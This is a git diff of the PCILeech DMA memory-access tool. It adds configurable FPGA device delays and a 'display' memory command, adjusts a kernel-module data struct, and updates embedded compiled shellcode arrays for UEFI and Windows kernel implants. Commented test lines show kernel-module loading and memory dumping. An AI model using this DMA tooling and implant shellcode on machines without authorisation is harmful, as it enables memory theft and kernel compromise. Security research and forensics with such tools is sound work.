diff --git a/pcileech/device605_601.c b/pcileech/device605_601.c
index 1732ec6..440c61e 100644
--- a/pcileech/device605_601.c
+++ b/pcileech/device605_601.c
@@ -30,9 +30,9 @@
// Delay in uS. DELAY_READ=300, DELAY_WRITE=150 -> 85MB/s.
// Values below are a bit more conservative for hw tolerance reasons.
-#define DELAY_READ 400
-#define DELAY_WRITE 175
-#define DELAY_PROBE 500
+#define DELAY_READ_DEFAULT 400
+#define DELAY_WRITE_DEFAULT 175
+#define DELAY_PROBE_DEFAULT 500
typedef struct tdDEVICE_CONTEXT_SP605_601 {
WORD wDeviceId;
@@ -84,8 +84,9 @@ typedef struct tdDEVICE_CONTEXT_SP605_601 {
} dev;
BOOL(*hRxTlpCallbackFn)(_Inout_ PTLP_CALLBACK_BUF_MRd pBufferMrd, _In_ PBYTE pb, _In_ DWORD cb, _In_opt_ HANDLE hEventCompleted);
- QWORD dbg_qwLastTx[8];
- DWORD dbg_cbLastTx;
+ DWORD DELAY_READ;
+ DWORD DELAY_WRITE;
+ DWORD DELAY_PROBE;
} DEVICE_CONTEXT_SP605_601, *PDEVICE_CONTEXT_SP605_601;
//-------------------------------------------------------------------------------
@@ -297,13 +298,13 @@ BOOL Device605_601_ReadDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qwA
isFlush = ((o % 0x8000) == 0x7000);
if(isFlush) {
Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, TRUE);
- usleep(DELAY_WRITE);
+ usleep(ctx->DELAY_WRITE);
} else {
Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, FALSE);
}
}
Device605_601_TxTlp(ctx, NULL, 0, TRUE, TRUE);
- usleep(DELAY_READ);
+ usleep(ctx->DELAY_READ);
Device605_601_RxTlpSynchronous(ctx);
ctx->pMRdBuffer = NULL;
return rxbuf.cb >= rxbuf.cbMax;
@@ -360,7 +361,7 @@ VOID Device605_601_ProbeDMA(_Inout_ PPCILEECH_CONTEXT ctxPcileech, _In_ QWORD qw
Device605_601_TxTlp(ctx, (PBYTE)tx, is32 ? 12 : 16, FALSE, (i % 24 == 0));
}
Device605_601_TxTlp(ctx, NULL, 0, TRUE, TRUE);
- usleep(DELAY_PROBE);
+ usleep(ctx->DELAY_PROBE);
Device605_601_RxTlpSynchronous(ctx);
ctx->hRxTlpCallbackFn = NULL;
ctx->pMRdBuffer = NULL;
@@ -472,6 +473,9 @@ BOOL Device605_601_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
ctx->txbuf.pb = LocalAlloc(0, ctx->txbuf.cbMax);
if(!ctx->txbuf.pb) { goto fail; }
ctx->isPrintTlp = ctxPcileech->cfg->fVerboseExtra;
+ ctx->DELAY_READ = ctxPcileech->cfg->qwDeviceOpt[0] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[0] : DELAY_READ_DEFAULT;
+ ctx->DELAY_WRITE = ctxPcileech->cfg->qwDeviceOpt[1] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[1] : DELAY_WRITE_DEFAULT;
+ ctx->DELAY_PROBE = ctxPcileech->cfg->qwDeviceOpt[2] ? (DWORD)ctxPcileech->cfg->qwDeviceOpt[2] : DELAY_PROBE_DEFAULT;
// set callback functions and fix up config
ctxPcileech->cfg->dev.tp = PCILEECH_DEVICE_SP605_FT601;
ctxPcileech->cfg->dev.qwMaxSizeDmaIo = SP605_601_MAX_SIZE_RX;
@@ -484,7 +488,13 @@ BOOL Device605_601_Open(_Inout_ PPCILEECH_CONTEXT ctxPcileech)
ctxPcileech->cfg->dev.pfnWriteTlp = Device605_601_WriteTlp;
ctxPcileech->cfg->dev.pfnListenTlp = Device605_601_ListenTlp;
// return
- if(ctxPcileech->cfg->fVerbose) { printf("Device Info: SP605 / FT601.\n"); }
+ if(ctxPcileech->cfg->fVerbose) {
+ if((ctx->DELAY_READ != DELAY_READ_DEFAULT) || (ctx->DELAY_WRITE != DELAY_WRITE_DEFAULT) || (ctx->DELAY_PROBE != DELAY_PROBE_DEFAULT)) {
+ printf("Device Info: SP605 / FT601 [%i,%i,%i]\n", ctx->DELAY_READ, ctx->DELAY_WRITE, ctx->DELAY_PROBE);
+ } else {
+ printf("Device Info: SP605 / FT601.\n");
+ }
+ }
return TRUE;
fail:
Device605_601_Close(ctxPcileech);
diff --git a/pcileech/executor.c b/pcileech/executor.c
index 1d62b95..74f7b41 100644
--- a/pcileech/executor.c
+++ b/pcileech/executor.c
@@ -342,7 +342,7 @@ VOID ActionExecShellcode(_Inout_ PPCILEECH_CONTEXT ctx)
goto fail;
}
// print to screen
- Util_PrintHexAscii(pbBuffer, cbLength);
+ Util_PrintHexAscii(pbBuffer, cbLength, 0);
// write to out file
if(ctx->cfg->szFileOut[0]) {
// open output file
diff --git a/pcileech/extra.c b/pcileech/extra.c
index ac538aa..4f25907 100644
--- a/pcileech/extra.c
+++ b/pcileech/extra.c
@@ -198,6 +198,11 @@ VOID Action_TlpTx(_Inout_ PPCILEECH_CONTEXT ctx)
{
if(ctx->cfg->cbIn < 12) {
printf("Action_TlpTx: Invalid TLP (too short).\n");
+ return;
+ }
+ if(ctx->cfg->cbIn % 4) {
+ printf("Action_TlpTx: Invalid TLP (length not multiple of 4).\n");
+ return;
}
printf("TLP: Transmitting PCIe TLP.%s\n", ctx->cfg->fVerboseExtra ? "" : " (use -vv option for detailed info).");
DeviceWriteTlp(ctx, ctx->cfg->pbIn, (DWORD)ctx->cfg->cbIn);
diff --git a/pcileech/help.c b/pcileech/help.c
index 0f3793f..b71446e 100644
--- a/pcileech/help.c
+++ b/pcileech/help.c
@@ -47,6 +47,7 @@ VOID Help_ShowGeneral()
" kmdload DMA [ pt, cr3 ] \n" \
" kmdexit KMD \n" \
" mount KMD [ s ] (Windows only feature) \n" \
+ " display DMA,KMD [ min, max ] \n" \
" pagedisplay DMA,KMD [ min ] \n" \
" pt_phys2virt DMA,KMD [ cr3, 0 ] \n" \
" testmemread DMA [ min ] \n" \
@@ -94,6 +95,9 @@ VOID Help_ShowGeneral()
" Valid options: USB3380, SP605_FT601, SP605_TCP \n" \
" -device-addr: Remote address for -device SP605_TCP. \n" \
" -device-port: Remote TCP port for -device SP605_TCP. Default value: 28472. \n" \
+ " -device-opt[0-3]: Optional additional device configuration for some devices.\n" \
+ " SP605_FT605 device: NB! 0 = default!. -device-opt0 = delay read uS \n" \
+ " -device-opt1 = delay write uS, -device-opt2 = delay probe uS \n" \
" -help: show help about the selected command or implant and then exit \n" \
" without running the command. Affects all modes and commands. \n" \
" Option has no value. Example: -help \n" \
@@ -140,7 +144,7 @@ VOID Help_ShowInfo()
printf(
" PCILEECH INFORMATION \n" \
" PCILeech (c) 2016, 2017 Ulf Frisk \n" \
- " Version: 2.5 \n" \
+ " Version: 2.5.1 \n" \
" License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 \n" \
" Contact information: pcileech@frizk.net \n" \
" System requirements: 64-bit Windows 7, 10 or Linux. \n" \
diff --git a/pcileech/memdump.c b/pcileech/memdump.c
index 1e299a8..7809c10 100644
--- a/pcileech/memdump.c
+++ b/pcileech/memdump.c
@@ -154,16 +154,37 @@ VOID ActionMemoryProbe(_Inout_ PPCILEECH_CONTEXT ctx)
printf("Memory Probe: Completed.\n");
}
-VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
+VOID ActionMemoryDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
{
- BYTE pb[4096];
- QWORD qwAddr = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
- if(!DeviceReadMEM(ctx, qwAddr, pb, 4096, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
- printf("Memory Page Read: Failed reading memory at address: 0x%016llX.\n", qwAddr);
+ QWORD qwAddrBase, qwAddrOffset, qwSize, qwSize_4kAlign;
+ PBYTE pb;
+ // allocate and calculate values
+ pb = LocalAlloc(0, 0x10000);
+ if(!pb) { return; }
+ qwAddrBase = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
+ qwAddrOffset = ctx->cfg->qwAddrMin & 0xff0;
+ qwSize_4kAlign = SIZE_PAGE_ALIGN_4K(ctx->cfg->qwAddrMax) - qwAddrBase;
+ qwSize = ((ctx->cfg->qwAddrMax + 0xf) & 0x0fffffffffffffff0) - (qwAddrBase + qwAddrOffset);
+ if(qwSize_4kAlign > 0x10000) {
+ qwSize = 0x100;
+ qwSize_4kAlign = (qwAddrOffset <= 0xf00) ? 0x1000 : 0x2000;
+ }
+ // read memory and display output
+ if(!DeviceReadMEM(ctx, qwAddrBase, pb, (DWORD)qwSize_4kAlign, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+ printf("Memory Display: Failed reading memory at address: 0x%016llX.\n", qwAddrBase);
+ LocalFree(pb);
return;
}
- printf("Memory Page Read: Page contents for address: 0x%016llX\n", qwAddr);
- Util_PrintHexAscii(pb, 4096);
+ printf("Memory Display: Contents for address: 0x%016llX\n", qwAddrBase);
+ Util_PrintHexAscii(pb, (DWORD)qwSize, (DWORD)qwAddrOffset);
+ LocalFree(pb);
+}
+
+VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+ ctx->cfg->qwAddrMin = ctx->cfg->qwAddrMin & 0x0fffffffffffff000;
+ ctx->cfg->qwAddrMax = ctx->cfg->qwAddrMin + 0x1000;
+ ActionMemoryDisplay(ctx);
}
VOID ActionMemoryTestReadWrite(_Inout_ PPCILEECH_CONTEXT ctx)
diff --git a/pcileech/memdump.h b/pcileech/memdump.h
index 234a36d..411d9dc 100644
--- a/pcileech/memdump.h
+++ b/pcileech/memdump.h
@@ -47,4 +47,11 @@ VOID ActionMemoryTestReadWrite(_Inout_ PPCILEECH_CONTEXT ctx);
*/
VOID ActionMemoryPageDisplay(_Inout_ PPCILEECH_CONTEXT ctx);
+/*
+* Print out a maximum of 16kB (0x10000) memory limited by the min and max
+* parameters in pCfg. By default 0x100 bytes are displayed.
+* -- ctx
+*/
+VOID ActionMemoryDisplay(_Inout_ PPCILEECH_CONTEXT ctx);
+
#endif /* __MEMDUMP_H__ */
\ No newline at end of file
diff --git a/pcileech/pcileech.c b/pcileech/pcileech.c
index 06a0c44..772da8a 100644
--- a/pcileech/pcileech.c
+++ b/pcileech/pcileech.c
@@ -33,6 +33,7 @@ BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[], _Inout_ PPCILEE
{.tp = MOUNT,.sz = "mount" },
{.tp = USB3380_START8051,.sz = "8051start" },
{.tp = USB3380_STOP8051,.sz = "8051stop" },
+ {.tp = DISPLAY,.sz = "display" },
{.tp = PAGEDISPLAY,.sz = "pagedisplay" },
{.tp = TESTMEMREAD,.sz = "testmemread" },
{.tp = TESTMEMREADWRITE,.sz = "testmemreadwrite" },
@@ -151,7 +152,9 @@ BOOL PCILeechConfigIntialize(_In_ DWORD argc, _In_ char* argv[], _Inout_ PPCILEE
}
} else if(2 == strlen(argv[i]) && '0' <= argv[i][1] && '9' >= argv[i][1]) { // -0..9 param
ctx->cfg->qwDataIn[argv[i][1] - '0'] = Util_GetNumeric(argv[i + 1]);
- }
+ } else if(!memcmp(argv[i], "-device-opt", 11) && (argv[i][11] >= '0') && (argv[i][11] <= '3')) { // -devopt[0-3] (device options)
+ ctx->cfg->qwDeviceOpt[argv[i][11] - '0'] = Util_GetNumeric(argv[i + 1]);
+ }
i += 2;
}
if(!ctx->cfg->pbIn) {
@@ -208,6 +211,14 @@ int main(_In_ int argc, _In_ char* argv[])
printf("PCILEECH: Out of memory.\n");
return 1;
}
+ //LPSTR szTMP[] = { "", "-device", "SP605_TCP", "-device-addr", "192.168.1.2", "dump", "-out", "none", "-min", "0x100000000", "-max", "0x110010000" };
+ //LPSTR szTMP[] = { "", "kmdload", "-kmd", "win10x64_ntfs_20170919_14240.kmd", "-min", "0x100000000" };
+ //LPSTR szTMP[] = { "", "mount", "-kmd", "win10_x64"};
+ //LPSTR szTMP[] = { "", "write", "-min", "0xc6010000", "-in", "c:\\temp\\16M_zero.raw"};
+ //LPSTR szTMP[] = { "", "pagedisplay", "-min", "0x1000", "-vv"};
+ ///LPSTR szTMP[] = { "", "dump", "-out", "none", "-min", "0x100000000", "-max", "0x120000000"};
+ //LPSTR szTMP[] = { "", "tlp", "-in", "00000000c30000ffc1000000", "-vv"};
+ //result = PCILeechConfigIntialize(sizeof(szTMP) / sizeof(LPSTR), szTMP, ctx);
result = PCILeechConfigIntialize((DWORD)argc, argv, ctx);
if(!result) {
Help_ShowGeneral();
@@ -257,6 +268,8 @@ int main(_In_ int argc, _In_ char* argv[])
ActionMemoryDump(ctx);
} else if(ctx->cfg->tpAction == WRITE) {
ActionMemoryWrite(ctx);
+ } else if(ctx->cfg->tpAction == DISPLAY) {
+ ActionMemoryDisplay(ctx);
} else if(ctx->cfg->tpAction == PAGEDISPLAY) {
ActionMemoryPageDisplay(ctx);
} else if(ctx->cfg->tpAction == PATCH) {
diff --git a/pcileech/pcileech.h b/pcileech/pcileech.h
index 9769433..14d0dae 100644
--- a/pcileech/pcileech.h
+++ b/pcileech/pcileech.h
@@ -29,6 +29,7 @@ typedef enum tdActionType {
USB3380_FLASH,
USB3380_START8051,
USB3380_STOP8051,
+ DISPLAY,
PAGEDISPLAY,
TESTMEMREAD,
TESTMEMREADWRITE,
@@ -75,6 +76,7 @@ typedef struct tdConfig {
QWORD cbIn;
CHAR szInS[MAX_PATH];
QWORD qwDataIn[10];
+ QWORD qwDeviceOpt[4];
ACTION_TYPE tpAction;
CHAR szSignatureName[MAX_PATH];
CHAR szKMDName[MAX_PATH];
@@ -163,7 +165,7 @@ typedef struct tdKmdExec {
* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
* This page/struct is used to communicate between the inserted kernel code and
* the pcileech program.
-* VNR: 002
+* VNR: 003
*/
typedef struct tdKMDDATA {
QWORD MAGIC; // [0x000] magic number 0x0ff11337711333377.
@@ -177,8 +179,8 @@ typedef struct tdKMDDATA {
QWORD _address; // [0x040] address to operate on.
QWORD _size; // [0x048] size of operation / data in DMA buffer.
QWORD OperatingSystem; // [0x050] operating system type
- QWORD ReservedKMD; // [0x058] reserved for specific kmd data (dependant on KMD version).
- QWORD ReservedFutureUse1[20]; // [0x060] reserved for future use.
+ QWORD ReservedKMD[8]; // [0x058] reserved for specific kmd data (dependant on KMD version).
+ QWORD ReservedFutureUse1[13]; // [0x098] reserved for future use.
QWORD dataInExtraLength; // [0x100] length of extra in-data.
QWORD dataInExtraOffset; // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
QWORD dataInExtraLengthMax; // [0x110] maximum length of extra in-data.
diff --git a/pcileech/shellcode.h b/pcileech/shellcode.h
index b8884cc..9f9e889 100644
--- a/pcileech/shellcode.h
+++ b/pcileech/shellcode.h
@@ -939,12 +939,12 @@ const BYTE UEFI_X64_BIN[] = {
0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x57, 0x48,
0x83, 0xec, 0x20, 0x48, 0x8b, 0xda, 0x45, 0x33, 0xc0, 0xba, 0x00, 0x10,
0x00, 0x00, 0x48, 0x8b, 0xf9, 0xe8, 0x59, 0xfe, 0xff, 0xff, 0xba, 0x04,
- 0x00, 0x00, 0x00, 0x48, 0x89, 0x5f, 0x58, 0x48, 0xb8, 0x77, 0x33, 0x33,
- 0x11, 0x77, 0x33, 0x11, 0xff, 0x48, 0xc7, 0x47, 0x50, 0x10, 0x00, 0x00,
- 0x00, 0xbd, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89, 0x07, 0x4c, 0x8d, 0x4c,
- 0x24, 0x30, 0x48, 0x89, 0x6c, 0x24, 0x30, 0x8d, 0x5a, 0xfd, 0x48, 0xc7,
- 0x47, 0x18, 0x00, 0x00, 0x00, 0x01, 0x8b, 0xcb, 0x41, 0xb8, 0x00, 0x10,
- 0x00, 0x00, 0xe8, 0x2f, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x31,
+ 0x00, 0x00, 0x00, 0x48, 0xc7, 0x47, 0x50, 0x10, 0x00, 0x00, 0x00, 0x48,
+ 0xb8, 0x77, 0x33, 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0x4c, 0x8d, 0x4c,
+ 0x24, 0x30, 0x48, 0x89, 0x07, 0xbd, 0xff, 0xff, 0xff, 0xff, 0x48, 0x89,
+ 0x5f, 0x58, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x8d, 0x5a, 0xfd, 0x48,
+ 0x89, 0x6c, 0x24, 0x30, 0x8b, 0xcb, 0x48, 0xc7, 0x47, 0x18, 0x00, 0x00,
+ 0x00, 0x01, 0xe8, 0x2f, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x31,
0x4c, 0x8d, 0x4c, 0x24, 0x30, 0x48, 0x89, 0x6c, 0x24, 0x30, 0x8d, 0x53,
0x03, 0x48, 0xc7, 0x47, 0x18, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00,
0x04, 0x00, 0x00, 0x8b, 0xcb, 0xe8, 0x08, 0xfe, 0xff, 0xff, 0x48, 0x85,
@@ -977,11 +977,11 @@ const BYTE UEFI_X64_BIN[] = {
const BYTE WINX64_VFS_KSH[] = {
- 0x37, 0x13, 0xec, 0x3c, 0x72, 0x06, 0xae, 0x99, 0x7a, 0x09, 0xe0, 0x83,
- 0x60, 0xa6, 0x94, 0x62, 0xb6, 0x64, 0x74, 0xfb, 0x90, 0x49, 0xd7, 0x36,
- 0xc7, 0xfe, 0x97, 0xc0, 0x26, 0xe0, 0x4c, 0xac, 0xb3, 0xa5, 0x41, 0x65,
- 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x0a, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x9a, 0x1a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x37, 0x13, 0xec, 0x3c, 0xfd, 0xf7, 0x30, 0x9f, 0x78, 0x47, 0xc0, 0x51,
+ 0x0e, 0x3b, 0xb5, 0x58, 0x72, 0xa5, 0xe9, 0x42, 0x30, 0x50, 0xe4, 0x5e,
+ 0xdf, 0x7b, 0x18, 0x97, 0x75, 0x04, 0xfa, 0x02, 0xf2, 0x66, 0x21, 0x13,
+ 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd7, 0x09, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x72, 0x19, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
@@ -1096,7 +1096,7 @@ const BYTE WINX64_VFS_KSH[] = {
0xc0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x33, 0xd2, 0x41, 0x8b, 0x86, 0x30,
0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x30, 0x48, 0x8d, 0x45, 0xf7, 0x48,
0x89, 0x4c, 0x24, 0x28, 0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x89, 0x44, 0x24,
- 0x20, 0xff, 0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75,
+ 0x20, 0xff, 0x97, 0xb8, 0x00, 0x00, 0x00, 0x8b, 0xd8, 0x85, 0xc0, 0x75,
0x0b, 0x48, 0x8b, 0x45, 0xff, 0x48, 0x89, 0x86, 0x00, 0x02, 0x00, 0x00,
0x48, 0x8b, 0x4d, 0x6f, 0x48, 0x85, 0xc9, 0x74, 0x06, 0xff, 0x97, 0x88,
0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x8b,
@@ -1148,70 +1148,45 @@ const BYTE WINX64_VFS_KSH[] = {
0xcb, 0xe8, 0x7e, 0xf9, 0xff, 0xff, 0xeb, 0xa0, 0xb8, 0x01, 0x00, 0x00,
0xc0, 0x48, 0x89, 0x83, 0x20, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xf0,
0x00, 0x00, 0x00, 0x5b, 0xc3, 0xcc, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x48,
- 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x55,
- 0x48, 0x8d, 0xa8, 0x38, 0xff, 0xff, 0xff, 0x48, 0x81, 0xec, 0xc0, 0x01,
- 0x00, 0x00, 0xb8, 0x4a, 0x45, 0x3b, 0xd7, 0x48, 0x89, 0x54, 0x24, 0x20,
- 0x48, 0x89, 0x44, 0x24, 0x28, 0x48, 0x8b, 0xf1, 0x48, 0x8d, 0x42, 0x08,
- 0x48, 0xc7, 0x44, 0x24, 0x38, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x89, 0x44,
- 0x24, 0x30, 0xb9, 0x2a, 0xd0, 0x35, 0x30, 0x48, 0x8d, 0x42, 0x10, 0x48,
- 0xc7, 0x44, 0x24, 0x68, 0x92, 0x6d, 0x58, 0x58, 0x48, 0x89, 0x44, 0x24,
- 0x40, 0xb8, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48,
- 0x8d, 0x42, 0x18, 0x48, 0x89, 0x44, 0x24, 0x50, 0xb8, 0xa1, 0x7b, 0xcc,
- 0xdc, 0x48, 0x89, 0x44, 0x24, 0x58, 0x48, 0x8d, 0x42, 0x20, 0x48, 0x89,
- 0x44, 0x24, 0x60, 0x48, 0x8d, 0x42, 0x28, 0x48, 0x89, 0x44, 0x24, 0x70,
- 0x48, 0x8d, 0x42, 0x30, 0x48, 0x89, 0x45, 0x80, 0x48, 0x8d, 0x42, 0x38,
- 0x48, 0x89, 0x45, 0x90, 0x48, 0x8d, 0x42, 0x40, 0x48, 0x89, 0x45, 0xa0,
- 0x48, 0x8d, 0x42, 0x48, 0x48, 0x89, 0x45, 0xb0, 0xb8, 0xf7, 0x38, 0xb3,
- 0x9d, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x8d, 0x42, 0x50, 0x48, 0x89, 0x45,
- 0xc0, 0x48, 0x8d, 0x42, 0x58, 0x48, 0x89, 0x45, 0xd0, 0xb8, 0x89, 0x83,
- 0x6c, 0xeb, 0x48, 0x89, 0x45, 0xd8, 0x48, 0x8d, 0x42, 0x60, 0x48, 0x89,
- 0x45, 0xe0, 0xb8, 0x9b, 0x97, 0x64, 0xcf, 0x48, 0x89, 0x45, 0xe8, 0x48,
- 0x8d, 0x42, 0x68, 0x48, 0x89, 0x45, 0xf0, 0xb8, 0x2a, 0xc0, 0xb2, 0xa8,
- 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8d, 0x42, 0x70, 0x48, 0x89, 0x45, 0x00,
- 0x48, 0x8d, 0x42, 0x78, 0x48, 0x89, 0x45, 0x10, 0x48, 0x89, 0x45, 0x20,
- 0x48, 0x8d, 0x82, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x30, 0xb8,
- 0xdb, 0x4f, 0x3d, 0xc5, 0x48, 0x89, 0x45, 0x38, 0x48, 0x8d, 0x82, 0x88,
- 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x40, 0x48, 0x8d, 0x82, 0x90, 0x00,
- 0x00, 0x00, 0x48, 0x89, 0x45, 0x50, 0xb8, 0x9d, 0x8f, 0xa0, 0xc3, 0x48,
- 0x89, 0x45, 0x58, 0x48, 0x8d, 0x82, 0x98, 0x00, 0x00, 0x00, 0x48, 0x89,
- 0x45, 0x60, 0xb8, 0xb8, 0xd4, 0x29, 0x88, 0x48, 0x89, 0x45, 0x68, 0x48,
- 0x8d, 0x82, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x45, 0x70, 0xb8, 0x16,
- 0x35, 0xfd, 0x87, 0x48, 0x89, 0x45, 0x78, 0x48, 0x8d, 0x82, 0xa0, 0x00,
- 0x00, 0x00, 0x48, 0x89, 0x85, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x82,
- 0xa8, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x78, 0xce, 0xad, 0x90,
- 0x4d, 0x48, 0xc7, 0x45, 0x88, 0x57, 0x63, 0x32, 0x5a, 0x48, 0xc7, 0x45,
- 0x98, 0x8f, 0xb5, 0x6a, 0x6a, 0x48, 0xc7, 0x45, 0xa8, 0xf9, 0xbe, 0xdd,
- 0x05, 0x48, 0xc7, 0x45, 0xc8, 0xc9, 0xc5, 0x6e, 0x6c, 0x48, 0xc7, 0x45,
- 0x08, 0x3d, 0x28, 0xc3, 0x7c, 0x48, 0x89, 0x4d, 0x18, 0x48, 0x89, 0x4d,
- 0x28, 0x48, 0xc7, 0x45, 0x48, 0x61, 0x4c, 0x04, 0x5d, 0x48, 0xc7, 0x85,
- 0x88, 0x00, 0x00, 0x00, 0x50, 0x64, 0xb0, 0x6f, 0x48, 0x89, 0x85, 0x90,
- 0x00, 0x00, 0x00, 0x48, 0x8d, 0x5c, 0x24, 0x20, 0xb8, 0xe2, 0xca, 0x61,
- 0xe6, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x36, 0x31, 0x0e, 0x68,
- 0x48, 0x89, 0x85, 0x98, 0x00, 0x00, 0x00, 0xbf, 0x1a, 0x00, 0x00, 0x00,
- 0x48, 0x8d, 0x82, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85, 0xa0, 0x00,
- 0x00, 0x00, 0xb8, 0xde, 0x24, 0xe6, 0xf7, 0x48, 0x89, 0x85, 0xa8, 0x00,
- 0x00, 0x00, 0x48, 0x8d, 0x82, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x85,
- 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x53, 0x08, 0x48, 0x8b, 0xce, 0xe8, 0x29,
- 0x00, 0x00, 0x00, 0x48, 0x8b, 0x0b, 0x48, 0x8d, 0x5b, 0x10, 0x48, 0x89,
- 0x01, 0x48, 0x83, 0xef, 0x01, 0x75, 0xe5, 0x4c, 0x8d, 0x9c, 0x24, 0xc0,
- 0x01, 0x00, 0x00, 0x49, 0x8b, 0x5b, 0x10, 0x49, 0x8b, 0x73, 0x18, 0x49,
- 0x8b, 0x7b, 0x20, 0x49, 0x8b, 0xe3, 0x5d, 0xc3, 0x48, 0x8b, 0xc4, 0x48,
- 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48, 0x89, 0x70, 0x18, 0x48,
- 0x89, 0x78, 0x20, 0x8b, 0xea, 0x48, 0x85, 0xc9, 0x74, 0x7a, 0xb8, 0x4d,
- 0x5a, 0x00, 0x00, 0x66, 0x39, 0x01, 0x75, 0x70, 0x48, 0x63, 0x41, 0x3c,
- 0x48, 0x03, 0xc1, 0x74, 0x67, 0x81, 0x38, 0x50, 0x45, 0x00, 0x00, 0x75,
- 0x5f, 0x8b, 0x90, 0x88, 0x00, 0x00, 0x00, 0x48, 0x03, 0xd1, 0x74, 0x54,
- 0x44, 0x8b, 0x5a, 0x18, 0x45, 0x85, 0xdb, 0x74, 0x4b, 0x8b, 0x42, 0x20,
- 0x85, 0xc0, 0x74, 0x44, 0x8b, 0x72, 0x24, 0x4c, 0x8d, 0x0c, 0x01, 0x8b,
- 0x7a, 0x1c, 0x48, 0x03, 0xf1, 0x48, 0x03, 0xf9, 0x45, 0x33, 0xc0, 0x45,
- 0x85, 0xdb, 0x74, 0x2c, 0x45, 0x8b, 0x11, 0x4c, 0x03, 0xd1, 0x33, 0xdb,
- 0xeb, 0x0b, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc2, 0xc1, 0xcb, 0x0d, 0x03,
- 0xd8, 0x41, 0x8a, 0x02, 0x84, 0xc0, 0x75, 0xee, 0x3b, 0xdd, 0x74, 0x23,
- 0x41, 0xff, 0xc0, 0x49, 0x83, 0xc1, 0x04, 0x45, 0x3b, 0xc3, 0x72, 0xd4,
- 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08, 0x48, 0x8b, 0x6c, 0x24, 0x10,
- 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b, 0x7c, 0x24, 0x20, 0xc3, 0x46,
- 0x0f, 0xb7, 0x04, 0x46, 0x44, 0x3b, 0x42, 0x14, 0x73, 0xde, 0x42, 0x8b,
- 0x04, 0x87, 0x48, 0x03, 0xc1, 0xeb, 0xd7, 0x00
+ 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48, 0x89, 0x78, 0x18, 0x4c,
+ 0x89, 0x70, 0x20, 0x55, 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0x90,
+ 0x00, 0x00, 0x00, 0x4c, 0x8b, 0xf1, 0xc7, 0x45, 0xe7, 0x4a, 0x45, 0x3b,
+ 0xd7, 0xc7, 0x45, 0xeb, 0x62, 0xe0, 0x07, 0x37, 0x48, 0x8d, 0xba, 0xc8,
+ 0x00, 0x00, 0x00, 0xc7, 0x45, 0xef, 0x1f, 0x9d, 0x48, 0x9d, 0x48, 0x8d,
+ 0x75, 0x4b, 0xc7, 0x45, 0xf3, 0xa1, 0x7b, 0xcc, 0xdc, 0xbb, 0x19, 0x00,
